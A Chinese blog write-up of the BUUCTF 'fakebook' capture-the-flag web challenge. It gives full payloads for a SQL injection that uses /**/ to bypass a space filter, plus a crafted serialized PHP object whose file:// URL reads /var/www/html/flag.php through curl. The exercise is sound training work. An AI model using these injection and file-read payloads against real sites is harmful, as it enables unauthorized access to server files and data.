美文网首页
2019-10-22 BUUCTF Web fakebook W

2019-10-22 BUUCTF Web fakebook W

作者: KanoWill | 来源:发表于2019-10-22 19:11 被阅读0次

废话:好久没写WP了(WTM忘了......)

第一步,发现view.php存在SQL注入,简单的过滤了空格,用/**/代替绕过。
payload:
?no=0/**/union/**/select/**/1,2,3,4#
发现报错,unserialize()说明数据以序列化字符串存储,报错信息暴露了网站目录:/var/www/html/
利用curl不仅可以http、https还可使用file协议的特性,构造反序列字符串即可
第二步,祭出目录扫描器,发现robot.txt里有信息,存在user.php.bak源码泄露
利用user.php成功构造序列化字符串
O:8:"UserInfo":3:{s:4:"name";s:1:"a";s:3:"age";i:1;s:4:"blog";s:27:"file:/var/www/html/flag.php";}
payload:

/view.php?no=0/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"a";s:3:"age";i:1;s:4:"blog";s:27:"file:/var/www/html/flag.php";}'#

访问发现读取栏没变化,可把我慌了,查看源代码


源码.png

base64解码后成功得到FLAG

相关文章

  • 2019-10-22 BUUCTF Web fakebook W

    废话:好久没写WP了(WTM忘了......) 第一步,发现view.php存在SQL注入,简单的过滤了空格,用/...

  • BUUCTF-[网鼎杯 2018]Fakebook 记录

    25.[网鼎杯 2018]Fakebook 首先打开界面如下,有两个按钮login、join,试了下login登录...

  • BUUCTF_WEB

    [HCTF 2018]WarmUp 打开链接后是一张图片,看看源码提示source.php,进入source.ph...

  • BUUCTF web WP

    0x01 [HCTF 2018]WarmUp f12看到提示进入source.php,看到代码 分析第一段代码,$...

  • BUUCTF-Web-WarmUp

    知识点:代码审计,phpmyadmin任意文件包含漏洞参考:phpmyadmin 4.8.1任意文件包含涉及函数:...

  • fakebook

    打开页面有一个登录键(login)和一个注册键(join) 直接在下面添加payload: 打开apache,复制...

  • [MRCTF2020]Ezpop

    今日重拾web,在BUUCTF上选个简单的题目[MRCTF2020]Ezpop做一下, 题目非常直接, 整个思路还...

  • PHP反序列化的一道题

    0x00 BUUCTF [极客大挑战2019] WEB PHP 0x01 题目 页面提示有备份网站的习惯,www....

  • BUUCTF-WEB-Online Tool

    复现地址:https://buuoj.cn/challenges#[BUUCTF%202018]Online%20...

  • 网页知识简介

    web标准介绍: w3c:万维网联盟组织,用来制定web标准的机构(组织) web标准:制作网页要遵循的规范。 w...

网友评论

      本文标题:2019-10-22 BUUCTF Web fakebook W

      本文链接:https://www.haomeiwen.com/subject/rplcvctx.html